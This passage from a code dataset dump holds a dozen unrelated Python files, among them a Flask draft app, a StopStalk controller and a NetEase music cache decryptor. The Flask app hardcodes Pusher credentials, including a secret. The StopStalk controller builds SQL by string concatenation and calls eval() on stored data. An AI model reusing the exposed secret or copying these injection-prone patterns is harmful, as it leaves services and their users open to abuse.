or ts_segment.start_time > self.__last_start_time__:\r\n self.queue.put(ts_segment)\r\n self.__last_start_time__ = ts_segment.end_time\r\n\r\n # Пример относительного пути, из которого нужно вытащить данные о дате и времени записи\r\n # \"2020/02/27/07/45/12-06000.ts?token=f0f5fdcf-dce2-4f91-bca0-fd2dd1c3af60\"\r\n def __parse_time__(self, uri):\r\n y = int(uri[0:4])\r\n m = int(uri[5:7])\r\n d = int(uri[8:10])\r\n h = int(uri[11:13]) + self.timezone_fix\r\n minutes = int(uri[14:16])\r\n s = int(uri[17:19])\r\n ms = int(uri[20:25])\r\n start_time = datetime.datetime(y, m, d, h, minutes, s, ms)\r\n return start_time\r\n","sub_path":"src/formulators.py","file_name":"formulators.py","file_ext":"py","file_size_in_byte":3235,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"39963559","text":"import math\r\n\r\ndef funkcjaKwadratowa(a, b, c):\r\n file = open(\"result.txt\", \"a\")\r\n file.write(\"a = \" + str(a) + \", b = \" + str(b) + \", c = \" + str(c) + \"\\n\")\r\n\r\n delta = b**2 - 4*a*c\r\n if delta > 0:\r\n x1 = (-b - math.sqrt(delta))/(2*a)\r\n x2 = (-b + math.sqrt(delta))/(2*a)\r\n file.write(\"Two results: \" + str(x1) + \" \" + str(x2) + \"\\n\\n\")\r\n\r\n elif delta == 0:\r\n x0 = -b/(2*a)\r\n file.write(\"One result: \" + str(x0) + \"\\n\\n\")\r\n\r\n else:\r\n file.write(\"No results\\n\\n\")\r\n\r\n file.close()\r\n\r\na = int(input(\"Podaj a: \"))\r\nb = int(input(\"Podaj b: \"))\r\nc = int(input(\"Podaj c: \"))\r\nfunkcjaKwadratowa(a, b, c)\r\n","sub_path":"lab2/zad7.py","file_name":"zad7.py","file_ext":"py","file_size_in_byte":661,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"210197871","text":"\n\n#calss header\nclass _FROGMAN():\n\tdef __init__(self,): \n\t\tself.name = \"FROGMAN\"\n\t\tself.definitions = [u'someone who swims or works underwater for a long time wearing breathing equipment, flippers (= rubber or plastic shoes that are 
longer than the feet), and usually a rubber suit: ']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn self.jsondata\n","sub_path":"xai/brain/wordbase/nouns/_frogman.py","file_name":"_frogman.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"217672875","text":"from flask import Flask, jsonify, request, render_template, redirect\nimport os\nimport requests\nimport json\nimport pusher\nfrom database import db_session\nfrom models import Draft\n\napp = Flask(__name__)\n\npusher_client = pusher.Pusher(\n app_id='628052',\n key='2c712e9027d8604455b8',\n secret='a7e5e6f8846b3620a7b0',\n cluster='us2',\n ssl=True)\n\n# Lines 18-20 are how the routes should look connected to the API\n# @app.route('/some-url')\n# def get_data():\n# return requests.get('http://localhost:1234/api/players').content\n\n@app.route('/')\ndef start():\n # players = Draft.query.all()\n # return render_template('index.html', players=players)\n return render_template('start.html')\n\n@app.route('/index')\ndef index():\n players = Draft.query.all()\n return render_template('index.html', players=players)\n\n@app.route('/backend', methods=[\"POST\", \"GET\"])\ndef backend():\n if request.method == \"POST\":\n player = request.form[\"player\"]\n team = request.form[\"team\"]\n new_player = Draft(player, team)\n db_session.add(new_player)\n db_session.commit()\n\n data = {\n \"id\": new_player.id,\n \"player\": player\n }\n\n pusher_client.trigger('table', 'new-record', {'data': data})\n\n return redirect(\"/backend\", code=302)\n else:\n players = Draft.query.all()\n return render_template('backend.html', players=players)\n\n@app.route('/edit/', methods=[\"POST\", \"GET\"])\ndef update_record(id):\n if request.method == \"POST\":\n player = request.form[\"player\"]\n team = 
request.form[\"team\"]\n\n update_player = Draft.query.get(id)\n update_player.player = player\n update_player.team = team\n db_session.commit()\n\n data = {\n \"id\": id,\n \"player\": player,\n \"team\": team\n }\n\n pusher_client.trigger('table', 'update-record', {'data': data})\n\n return redirect(\"/backend\", code=302)\n else:\n new_player = Draft.query.get(id)\n\n return render_template('update_player.html', data=new_player)\n\n@app.route('/delete/', methods=[\"DELETE\"])\ndef delete_record(id):\n delPlayer= [ player for player in Draft if player['id'] == id]\n Draft.remove(delPlayer[0])\n db_session.commit()\n\n data = {\n \"id\": id,\n \"player\": player,\n \"team\": team\n }\n\n pusher_client.trigger('table', 'delete-record', {'data': data})\n\n return redirect(\"/backend\", code=302)\n\n\n# Code for Heroku Logging\n# class HerokuConfig(ProductionConfig):\n# @classmethod\n# def init_app(cls, app):\n# ProductionConfig.init_app(app)\n#\n# import logging\n# from logging import StreamHandler\n# file_handler = StreamHandler()\n# file_handler.setLevel(logging.WARNING)\n# app.logger.addHandler(file_handler)\n\n\n# @app.route('/jedi/', methods=['DELETE'])\n# def delete(name):\n# jed = [jedi for jedi in Jedi if jedi['name'] == name]\n# Jedi.remove(jed[0])\n# return jsonify({'Jedi' : Jedi})\n\n\n@app.teardown_appcontext\ndef shutdown_session(exception=None):\n db_session.remove()\n\n# run Flask app\nif __name__ == \"__main__\":\n app.run()\n","sub_path":"draftApp/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":3201,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"21595878","text":"#!/usr/bin/python3\n\nimport argparse\n\n\"\"\"\nApplication Name\nby Olof Sjödin \n\nGPL v3\n\"\"\"\n\ndef main():\n parser = argparse.ArgumentParser(description=\"\")\n parser.add_argument(\"--example\", dest=\"example\", action=\"store_true\")\n\n args = parser.parse_args()\n\n args.example\n\nif __name__ == 
\"__main__\":\n main()\n","sub_path":"Python/terminal-app.py","file_name":"terminal-app.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"622468795","text":"\"\"\"\nGiven an encoded string, return it's decoded string.\n\nThe encoding rule is: k[encoded_string], where the encoded_string inside the square brackets\nis being repeated exactly k times. Note that k is guaranteed to be a positive integer.\n\nYou may assume that the input string is always valid; No extra white spaces, square brackets\nare well-formed, etc.\n\nFurthermore, you may assume that the original data does not contain any digits and that digits\nare only for those repeat numbers, k. For example, there won't be input like 3a or 2[4].\n\"\"\"\nclass Solution(object):\n def decodeString(self, s):\n stack = []\n n = 0\n res = ''\n for c in s:\n if c == '[':\n stack.append(res)\n stack.append(n)\n res = ''\n n = 0\n elif c == ']':\n repeat = stack.pop()\n prev = stack.pop()\n res = prev + repeat * res\n elif c.isdigit():\n n = n * 10 + int(c) # might more than 1 digit\n else:\n res += c\n return res\n\n def decodeString2(self, s):\n # Idea two stack, one for count, one for result till now\n res = ''\n cntStack = []\n resStack = []\n i = 0\n while i < len(s):\n if s[i].isdigit():\n cnt = 0\n while s[i].isdigit(): # get all the digits\n cnt = int(s[i])\n i += 1\n cntStack.append(cnt)\n elif s[i] == '[':\n resStack.append(res)\n res = ''\n i += 1\n elif s[i] == ']':\n tmp = resStack.pop()\n repeat = cntStack.pop()\n for _ in range(repeat):\n tmp += res\n res = tmp\n i += 1\n else:\n res += s[i]\n i += 1\n\n return res\n\n\n# s = \"3[a]2[bc]\"\n# s = \"3[a2[c]]\"\ns = \"2[abc]3[cd]ef\"\nprint(Solution().decodeString(s))","sub_path":"394DecodeStr.py","file_name":"394DecodeStr.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} 
+{"seq_id":"377200014","text":"from WMCore.Configuration import Configuration\nfrom CRABClient.UserUtilities import config\n\nconfig = config()\n\nconfig.General.requestName = 'SingleMuPt200_2ndfull_2nd_step1'\nconfig.General.workArea = 'crab_projects_pt200_2ndfull_2nd_withPU'\nconfig.General.transferOutputs = True\nconfig.General.failureLimit=1\nconfig.General.transferLogs=True\n\nconfig.JobType.pluginName = 'PrivateMC'\nconfig.JobType.psetName = 'SingleMuPt200_2ndfull_2nd_GEN_SIM.py'\n\n#config.Data.outputPrimaryDataset = 'MinBias'\nconfig.Data.splitting = 'EventBased'\nconfig.Data.unitsPerJob = 100\nNJOBS = 5000 # This is not a configuration parameter, but an auxiliary variable that we use in the next line.\nconfig.Data.totalUnits = config.Data.unitsPerJob * NJOBS\nconfig.Data.publication = True\nconfig.Data.outputDatasetTag = 'SingleMuPt200_2ndfull_2nd_GEN-SIM_step1'\nconfig.Data.outputPrimaryDataset = 'SingleMuPt200_2ndfull_2nd_GEN-SIM_step1_neha'\nconfig.Site.storageSite = 'T2_US_Florida'\n","sub_path":"CRAB_SUBMISSION/Pt_200/crab_gen_200_2ndfull_2nd.py","file_name":"crab_gen_200_2ndfull_2nd.py","file_ext":"py","file_size_in_byte":958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"300517790","text":"import utilities\nimport time\nfrom datetime import date\n\"\"\"\n @ToDo: Loads of cleanup :D\n\"\"\"\n\n# ----------------------------------------------------------------------------\ndef index():\n \"\"\"\n The main controller which redirects depending\n on the login status of the user and does some\n extra pre-processing\n \"\"\"\n\n # If the user is logged in\n if session[\"auth\"]:\n session[\"handle\"] = session[\"auth\"][\"user\"][\"stopstalk_handle\"]\n session[\"user_id\"] = session[\"auth\"][\"user\"][\"id\"]\n session.flash = \"Logged in successfully\"\n session.url_count = 0\n redirect(URL(\"default\", \"submissions\", args=[1]))\n\n # Detect a registration has taken place\n # This will be the 
case when submission on\n # a register user form is done.\n row = db(db.auth_event.id > 0).select().last()\n if row:\n desc = row.description\n else:\n desc = \"\"\n\n # If the last auth_event record contains registered\n # or verification then retrieve submissions\n if desc.__contains__(\"Registered\") or \\\n desc.__contains__(\"Verification\"):\n reg_user = desc.split(\" \")[1]\n r = db(db.friends.user_id == reg_user).select()\n utilities.retrieve_submissions(int(reg_user))\n\n # User has a `set` of friends' ids\n # If user does not exists then initialize it with empty set\n if len(r) == 0:\n db.friends.insert(user_id=int(reg_user),\n friends_list=str(set([])))\n\n response.flash = T(\"Please Login\")\n return dict()\n\n# ----------------------------------------------------------------------------\ndef get_max_streak(handle):\n \"\"\"\n Get the maximum of all streaks\n\n @Todo: There is some bug here\n \"\"\"\n\n # Build the complex SQL query\n sql_query = \"\"\"\n SELECT time_stamp, COUNT(*)\n FROM submission\n WHERE submission.stopstalk_handle=\n \"\"\"\n\n sql_query += \"'\" + handle + \"' \"\n sql_query += \"\"\"\n GROUP BY DATE(submission.time_stamp), submission.status;\n \"\"\"\n\n row = db.executesql(sql_query)\n\n streak = 0\n max_streak = 0\n prev = curr = start = None\n total_submissions = 0\n\n for i in row:\n\n total_submissions += i[1]\n if prev is None and streak == 0:\n prev = time.strptime(str(i[0]), \"%Y-%m-%d %H:%M:%S\")\n prev = date(prev.tm_year, prev.tm_mon, prev.tm_mday)\n streak = 1\n start = prev\n else:\n curr = time.strptime(str(i[0]), \"%Y-%m-%d %H:%M:%S\")\n curr = date(curr.tm_year, curr.tm_mon, curr.tm_mday)\n\n if (curr - prev).days == 1:\n streak += 1\n elif curr != prev:\n streak = 1\n\n prev = curr\n\n if streak > max_streak:\n max_streak = streak\n\n today = datetime.today().date()\n\n # There are no submissions in the database for this user\n if prev is None:\n return (0, 0, 0)\n\n # Check if the last streak is continued till 
today\n if (today - prev).days > 1:\n streak = 0\n\n return max_streak, total_submissions, streak\n\n# ----------------------------------------------------------------------------\n@auth.requires_login()\ndef notifications():\n \"\"\"\n Check if any of the friends(includes CUSTOM) of\n the logged-in user is on a streak\n \"\"\"\n\n if session[\"user_id\"] is None:\n redirect(URL(\"default\", \"index\"))\n\n ftable = db.friends\n atable = db.auth_user\n ctable = db.custom_friend\n\n # Check for streak of friends on stopstalk\n query = (ftable.user_id == session[\"user_id\"])\n row = db(query).select(ftable.friends_list).first()\n\n # Will contain list of handles of all the friends along\n # with the Custom Users added by the logged-in user\n handles = []\n\n for user in eval(row.friends_list):\n query = (atable.id == user)\n user_data = db(query).select(atable.first_name,\n atable.last_name,\n atable.stopstalk_handle).first()\n\n handles.append((user_data.stopstalk_handle,\n user_data.first_name + \" \" + user_data.last_name))\n\n # Check for streak of custom friends\n query = (ctable.user_id == session[\"user_id\"])\n rows = db(query).select(ctable.first_name,\n ctable.last_name,\n ctable.stopstalk_handle)\n for user in rows:\n handles.append((user.stopstalk_handle,\n user.first_name + \" \" + user.last_name))\n\n # List of users with non-zero streak\n users_on_streak = []\n\n for handle in handles:\n max_streak, total_submissions, curr_streak = get_max_streak(handle[0])\n\n # If streak is non-zero append to users_on_streak list\n if curr_streak:\n users_on_streak.append((handle, curr_streak))\n\n # Sort the users on streak by their streak\n users_on_streak.sort(key=lambda k: k[1], reverse=True)\n\n # The table containing users on streak\n table = TABLE(TR(TH(H3(STRONG(\"User\"))),\n TH(H3(STRONG(\"Streak\"),\n _class=\"center\"))),\n _class=\"table\")\n\n # Append all the users to the final table\n for users in users_on_streak:\n handle = users[0]\n curr_streak = 
users[1]\n tr = TR(TD(H3(A(handle[1],\n _href=URL(\"user\", \"profile\", args=[handle[0]])))),\n TD(H3(str(curr_streak) + \" \",\n I(_class=\"fa fa-bolt\",\n _style=\"color:red\"),\n _class=\"center\",\n )))\n table.append(tr)\n\n return dict(table=table)\n\n# ----------------------------------------------------------------------------\ndef compute_row(user, custom=False):\n \"\"\"\n Computes rating and retrieves other\n information of the specified user\n \"\"\"\n\n max_streak, total_submissions, curr_streak = get_max_streak(user.stopstalk_handle)\n\n if total_submissions == 0:\n return ()\n\n stable = db.submission\n\n # Find the total solved problems(Lesser than total accepted)\n query = (stable.stopstalk_handle == user.stopstalk_handle)\n query &= (stable.status == \"AC\")\n accepted = db(query).select(stable.problem_name, distinct=True)\n accepted = len(accepted)\n\n # Unique rating formula\n # @ToDo: Improvement is always better\n rating = max_streak * 10 + \\\n accepted * 50 + \\\n (accepted * 100.0 / total_submissions) * 80 + \\\n (total_submissions - accepted) * 15\n rating = int(rating)\n\n table = db.auth_user\n if custom:\n table = db.custom_friend\n\n # Update the rating whenever leaderboard page is loaded\n db(table.stopstalk_handle == user.stopstalk_handle).update(rating=rating)\n\n return (user.first_name + \" \" + user.last_name,\n user.stopstalk_handle,\n user.institute,\n rating)\n\n# ----------------------------------------------------------------------------\ndef leaderboard():\n \"\"\"\n Get a table with users sorted by rating\n \"\"\"\n\n reg_users = db(db.auth_user.id > 0).select()\n custom_users = db(db.custom_friend.id > 0).select()\n\n users = []\n\n for user in reg_users:\n tup = compute_row(user)\n if tup is not ():\n users.append(tup)\n\n for user in custom_users:\n tup = compute_row(user, True)\n if tup is not ():\n users.append(tup)\n\n # Sort users according to the rating\n users = sorted(users, key=lambda x: x[3], reverse=True)\n\n 
table = TABLE(_class=\"table\")\n table.append(TR(TH(\"Name\"),\n TH(\"StopStalk Handle\"),\n TH(\"Institute\"),\n TH(\"StopStalk Rating\")))\n\n for i in users:\n\n # If there are no submissions of the user in the database\n if i is ():\n continue\n\n tr = TR()\n tr.append(TD(i[0]))\n tr.append(TD(A(i[1],\n _href=URL(\"user\", \"profile\", args=[i[1]]))))\n tr.append(TD(i[2]))\n tr.append(TD(i[3]))\n table.append(tr)\n\n return dict(table=table)\n\n# ----------------------------------------------------------------------------\ndef user():\n \"\"\"\n Use the standard auth for user\n \"\"\"\n return dict(form=auth())\n\n# ----------------------------------------------------------------------------\n@auth.requires_login()\ndef search():\n return dict()\n\n# ----------------------------------------------------------------------------\n@auth.requires_login()\ndef mark_friend():\n \"\"\"\n Send a friend request\n \"\"\"\n\n if len(request.args) < 1:\n session.flash = \"Friend Request sent\"\n redirect(URL(\"default\", \"search\"))\n\n # Insert a tuple of users' id into the friend_requests table\n db.friend_requests.insert(from_h=session.user_id, to_h=request.args[0])\n session.flash = \"Friend Request sent\"\n redirect(URL(\"default\", \"search.html\"))\n return dict()\n\n# ----------------------------------------------------------------------------\n@auth.requires_login()\ndef retrieve_users():\n \"\"\"\n Show the list of registered users\n \"\"\"\n\n atable = db.auth_user\n frtable = db.friend_requests\n q = request.get_vars.get(\"q\", None)\n\n query = (atable.first_name.like(\"%\" + q + \"%\",\n case_sensitive=False))\n query |= (atable.last_name.like(\"%\" + q + \"%\",\n case_sensitive=False))\n query |= (atable.stopstalk_handle.like(\"%\" + q + \"%\",\n case_sensitive=False))\n\n for site in current.SITES:\n field_name = site.lower() + \"_handle\"\n query |= (atable[field_name].like(\"%\" + q + \"%\",\n case_sensitive=False))\n\n # Don't show the logged in user in 
the search\n query &= (atable.id != session.user_id)\n\n # Don't show users who have sent friend requests\n # to the logged in user\n tmprows = db(frtable.from_h != session.user_id).select(frtable.from_h)\n for row in tmprows:\n query &= (atable.id != row.from_h)\n\n rows = db(query).select()\n\n t = TABLE(_class=\"table\")\n tr = TR(TH(\"Name\"),\n TH(\"StopStalk Handle\"))\n\n for site in current.SITES:\n tr.append(TH(site + \" Handle\"))\n\n tr.append(TH(\"Friendship Status\"))\n t.append(tr)\n\n for user in rows:\n\n friends = db(db.friends.user_id == user.id).select().first()\n friends = eval(friends.friends_list)\n tr = TR()\n tr.append(TD(user.first_name + \" \" + user.last_name))\n tr.append(TD(user.stopstalk_handle))\n\n for site in current.SITES:\n tr.append(TD(user[site.lower() + \"_handle\"]))\n\n # Check if the current user is already a friend or not\n if session.user_id not in friends:\n r = db((frtable.from_h == session.user_id) &\n (frtable.to_h == user.id)).select()\n if len(r) == 0:\n tr.append(TD(FORM(INPUT(_type=\"submit\",\n _value=\"Add Friend\",\n _class=\"btn btn-warning\"),\n _action=URL(\"default\", \"mark_friend\",\n args=[user.id]))))\n else:\n tr.append(TD(\"Friend request sent\"))\n else:\n tr.append(TD(\"Already friends\"))\n t.append(tr)\n\n return dict(t=t)\n\n# ----------------------------------------------------------------------------\n@auth.requires_login()\ndef submissions():\n \"\"\"\n Retrieve submissions of the logged-in user\n \"\"\"\n\n if len(request.args) == 0:\n active = \"1\"\n else:\n active = request.args[0]\n\n # Retrieve all the custom users created by the logged-in user\n query = (db.custom_friend.user_id == session.user_id)\n custom_friends = db(query).select(db.custom_friend.id)\n\n cusfriends = []\n for friend in custom_friends:\n cusfriends.append(friend.id)\n\n # Get the friends of logged in user\n query = (db.friends.user_id == session.user_id)\n friends = db(query).select(db.friends.friends_list).first()\n 
friends = tuple(eval(friends.friends_list))\n\n query = (db.submission.user_id.belongs(friends))\n query |= (db.submission.custom_user_id.belongs(cusfriends))\n count = db(query).count()\n count = count / 100 + 1\n\n if request.extension == \"json\":\n return dict(count=count)\n\n # Retrieve user submissions only on page 1\n if active == \"1\":\n for i in friends:\n utilities.retrieve_submissions(i)\n\n for i in cusfriends:\n utilities.retrieve_submissions(i, custom=True)\n\n offset = 100 * (int(active) - 1)\n # Retrieve only 100 submissions from the offset\n rows = db(query).select(orderby=~db.submission.time_stamp,\n limitby=(offset, offset + 100))\n\n table = utilities.render_table(rows)\n return dict(table=table)\n\n# ----------------------------------------------------------------------------\ndef call():\n \"\"\"\n exposes services. for example:\n http://..../[app]/default/call/jsonrpc\n decorate with @services.jsonrpc the functions to expose\n supports xml, json, xmlrpc, jsonrpc, amfrpc, rss, csv\n \"\"\"\n return service()\n","sub_path":"controllers/default.py","file_name":"default.py","file_ext":"py","file_size_in_byte":13445,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"529430563","text":"import random\n\n\ntimes = [\"утром\", \"днём\", \"вечером\", \"ночью\", \"после обеда\", \"перед сном\"]\nadvices = [\"ожидайте\", \"предостерегайтесь\", \"будьте открыты для\"]\npromises = [\"гостей из забытого прошлого\",\n\t\t\t\"встреч со старыми знакомыми\",\n\t\t\t\"неожиданного праздника\",\n\t\t\t\"приятных перемен\"]\n\ngenerated_prophecies = []\n\ni = 0\nwhile i < 5:\n\tj = 0\n\tprediction = []\n\n\twhile j < 3:\n\t\tpr_times =random.randrange(0,len(times))\n\t\tpr_advices =random.randrange(0,len(advices))\n\t\tpr_promises =random.randrange(0,len(promises))\n\n\t\tp1 =str(times[pr_times]).capitalize()\n\t\tp2 =str(advices[pr_advices])\n\t\tp3 =str(promises[pr_promises])\n\n\t\tprediction = (p1,\"\" + 
p2,\"\"+p3,\".\")\n\t\tj = j+1\n\n\t\tgenerated_prophecies.append(prediction)\n\n\t\ti = i + 1\n\nprint(generated_prophecies)","sub_path":"М1/horoscope.py","file_name":"horoscope.py","file_ext":"py","file_size_in_byte":927,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"585310054","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('myblog', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Navbar',\n fields=[\n ('id', models.AutoField(verbose_name='ID', serialize=False, auto_created=True, primary_key=True)),\n ('name', models.CharField(max_length=30, verbose_name='\\u540d\\u79f0')),\n ('url', models.CharField(max_length=100, null=True, verbose_name='Url')),\n ('blank', models.CharField(max_length=20, verbose_name='\\u6253\\u5f00\\u5c5e\\u6027')),\n ('ordernum', models.IntegerField(default=0, verbose_name='\\u6392\\u5e8f')),\n ('parent', models.ForeignKey(blank=True, to='myblog.Navbar', null=True)),\n ],\n options={\n 'verbose_name': '\\u5bfc\\u822a',\n 'verbose_name_plural': '\\u5bfc\\u822a',\n },\n ),\n ]\n","sub_path":"mydjango/myblog/migrations/0002_navbar.py","file_name":"0002_navbar.py","file_ext":"py","file_size_in_byte":1058,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"320574274","text":"# -*- coding: utf-8 -*-\n# @author Masakaze Sato\n# @file TestSearchWeb.py\n# @note ウェブ探索のテスト\n\nimport sys, os\nsys.path.append(os.path.join(os.path.dirname(__file__), \"..\"))\n\nfrom Component.ActionComponentLookWebPage import ActionComponentLookWebPage\nfrom Component import BodyComponentPCVirtual\nfrom Component.ComponentArgFeatureImage import ComponentArgFeatureImage\nfrom Component.ComponentArgLookWebPage import ComponentArgLookWebPage\nfrom Component.ComponentArgStimulusLook import 
ComponentArgStimulusLook\n\nif __name__ == \"__main__\":\n # Bodyに視覚刺激\n body = BodyComponentPCVirtual.BodyComponentPCVirtual()\n body.enable()\n\n image_file = os.path.join(os.path.dirname(__file__), \"..\", \"..\", \"EyeSensor\", \"SampleImage\", \"Apple.jpg\")\n look_arg = ComponentArgStimulusLook(image_file)\n body.try_stimulate(look_arg)\n\n for i in range(2):\n features = []\n cnt = 0\n while len(features) == 0:\n print(\"\\rLoopWait for pop_features:\" + str(cnt), end=\"\")\n features = body.pop_features([ComponentArgFeatureImage.ARG_TYPE])\n cnt += 1\n\n # image_fileからDesireComponent更新\n\n # DesireComponentからurlを生成\n\n # LookPageAction\n action = ActionComponentLookWebPage(body)\n action.execute([ComponentArgLookWebPage(\"https://ja.wikipedia.org/wiki/%E3%83%AA%E3%83%B3%E3%82%B4\")])\n # for \n body.disable()\n","sub_path":"AI/ComponentConnectTest/TestSearchWeb.py","file_name":"TestSearchWeb.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"369220510","text":"from mutagen.easyid3 import EasyID3\r\nfrom mutagen.mp3 import MP3\r\nfrom itertools import zip_longest\r\nfrom collections import Iterable\r\nfrom lxml import etree\r\nfrom operator import or_\r\nimport sys\r\nimport requests \r\nimport json\r\nimport glob\r\nimport re\r\nimport os\r\n\r\n\r\nclass netEaseMusic:\r\n def __init__(self,path=''):\r\n if path == '':path = input('input the path of cached netease_music')\r\n self.path = path\r\n os.chdir(path)\r\n self.names=glob.glob('*.uc!')\r\n self.id_mp = {}\r\n for i in self.names:self.id_mp[self.getId(i)] = i\r\n self.absPaths=[os.path.abspath(i) for i in self.names]\r\n self.prep()\r\n self.headers={\r\n 'Referer':'http://music.163.com/',\r\n 'Host':'music.163.com',\r\n 'Connection':'keep-alive',\r\n 'User-Agent': 'ozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36',\r\n 
'Accept':'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8'\r\n }\r\n self.nameXpath ='//div[@class=\"tit\"]/em[@class=\"f-ff2\"]/text()'\r\n self.lrcSentencePt=re.compile(r'\\[\\d+:\\d+.\\d+\\]([\\w\\d]+)\\\\n') # wrong (r'\\[\\d+,\\d+\\](\\(\\d+,\\d+\\)(\\w))+\\n')\r\n self.hasLrcPt= re.compile(r'(lyric|lrc|klyric|kalaokLyric|tlyric)\\s*[\\'\\\"]:\\s*[\\'\\\"]\\s*\\[')\r\n self.lrcKey = li = 'lyric|lrc|klyric|kalaokLyric|tlyric'.split('|')\r\n def prep(self): \r\n self.prt= os.path.dirname(os.getcwd())\r\n self.cd('cached_网易云音乐')\r\n self.cd('cached_网易云音乐/lyric')\r\n self.cd('cached_网易云音乐/music')\r\n \r\n def cd(self,s):\r\n '''cd to the dir path+s, (create it first if not exists)'''\r\n try:\r\n os.chdir(self.prt)\r\n os.chdir(s)\r\n except:\r\n os.mkdir(s)\r\n os.chdir(s)\r\n \r\n def getId(self,name):\r\n if name[-1] not in '0987654321':\r\n name = os.path.basename(name)\r\n return name[:name.find('-')]\r\n def getIdFromIdx(self,idxFileName):\r\n with open(idxFileName,'r') as f:\r\n try:\r\n info = json.load(f) # r'\\\"musicId\\\":(\\d+)'\r\n except:\r\n raise Exception('file {} is breaken'.format(idxFileName))\r\n return info['musicId']\r\n def crawlName(self,musicId):\r\n url = 'https://music.163.com/#/song?id='+str(musicId)\r\n r= requests.get(url,headers = self.headers)\r\n if r.status_code !=200:\r\n print(r.status_code)\r\n raise Exception('crawl Name Failed! Bad Responde from '+url)\r\n sl = etree.HTML(r.text)\r\n try:\r\n return sl.xpath(self.nameXpath)[0]\r\n except:\r\n raise Exception('not find music name of id : '+str(musicId))\r\n def crawlLrc(self,musicId):\r\n url = ('http://music.163.com/api/song/lyric?id=' + str(musicId) + '&lv=1&kv=1&tv=-1')\r\n try:\r\n return requests.get(url).text\r\n except:\r\n raise Exception('crawl lyric Failed! 
Bad Responde from '+url)\r\n def lrcFromFile(self,musicId):\r\n self.cd('Lyric')\r\n ### 而直接字符串操作路径可能出错\r\n with open(str(musicId),'r',errors = 'ignore') as f: \r\n try:\r\n s=''\r\n d=json.load(f,encoding='utf8')\r\n if self.noLrc(d):return ''\r\n else:\r\n for i in self.lrcKey:\r\n if i in d and d[i]!='':s+= d[i]\r\n except:pass\r\n finally:return s\r\n def noLrc(self,s):\r\n '''judge if a dict or a string has lyrics'''\r\n if isinstance(s,str):\r\n return self.hasLrcPt.search(s) is None\r\n else:\r\n return not reduce(or_,[i in s and s[i]!='' for i in self.lrcKey]) \r\n def getLyric(self,musicId):\r\n lrc = self.lrcFromFile(musicId)\r\n name = self.id_mp[musicId]\r\n if lrc =='':\r\n try:\r\n lrc = self.crawlLrc(musicId)\r\n except:\r\n print('fail to get lyric of music '+name)\r\n return \r\n lrc_lst = self.lrcSentencePt.findall(lrc)\r\n if lrc_lst==[]:return\r\n self.cd('cached_网易云音乐/lyric')\r\n with open(name +'.txt','w') as f:\r\n f.write(name+'\\n\\n')\r\n f.write('\\n'.join(lrc_lst))\r\n return lrc_lst\r\n def getInfo(self,musicId):\r\n try:return self.getInfoFromMp3(musicId)\r\n except:\r\n try:\r\n with open(self.id_mp[musicId][:-3]+'idx') as f:\r\n s = f.read()\r\n name = re.findall(r'\\[ti:(.*?)\\]',s)[0]\r\n singer = re.findall(r'\\[ar:(.*?)\\]',lrc)[0]\r\n return {'artist':singer,'title':name}\r\n except:return {}\r\n \r\n def getInfoFromMp3(self,musicPath):\r\n tag = MP3(musicPath,ID3 = EasyID3)\r\n return dict(tag)\r\n def _genFileName(self,dic):\r\n tmp = ''\r\n if 'title' in dic: tmp = '-'.join(dic['title'])\r\n if 'artist' in dic: tmp+='--'+'-'.join(dic['artist'])\r\n if tmp =='--':\r\n try:tmp = self.crawlName()\r\n except Exception as e:\r\n print(repr(e))\r\n tmp = 'netease-music-'+musicId\r\n return tmp\r\n def decrypt(self,fileName):\r\n with open (fileName,'rb') as f:\r\n btay = bytearray(f.read())\r\n musicId = self.getId(fileName)\r\n self.cd('cached_网易云音乐/music')\r\n with open(str(musicId),'wb') as out:\r\n for i,j in 
enumerate(btay):\r\n btay[i] = j ^ 0xa3\r\n out.write(bytes(btay))\r\n dic = self.getInfo(musicId)\r\n newName = self.id_mp[musicId] = self._genFileName(dic)\r\n if newName == '':newName = musicId\r\n try:os.rename(musicId,newName+'.mp3')\r\n except:pass\r\n return musicId\r\n def getMusic(self):\r\n for i in self.absPaths:\r\n musicId = self.decrypt(i)\r\n self.getLyric(musicId)\r\n\r\n\r\n\r\npath = sys.argv[1:][0].strip()\r\n#path = 'C:\\\\Users\\\\mbinary\\\\Desktop\\\\source\\\\myscripts\\\\Music1'\r\nhd = netEaseMusic(path)\r\nhd.getMusic()\r\n","sub_path":"src/netease-music_v0.py","file_name":"netease-music_v0.py","file_ext":"py","file_size_in_byte":6228,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"17"} +{"seq_id":"215853732","text":"import re\nimport sys\nimport inspect\nimport numpy as nu\nfrom numpy import array\nfrom astrometry.util import pyfits_utils as fu\nimport pyfits\nimport galpy.util.bovy_plot as plot\nfrom matplotlib import 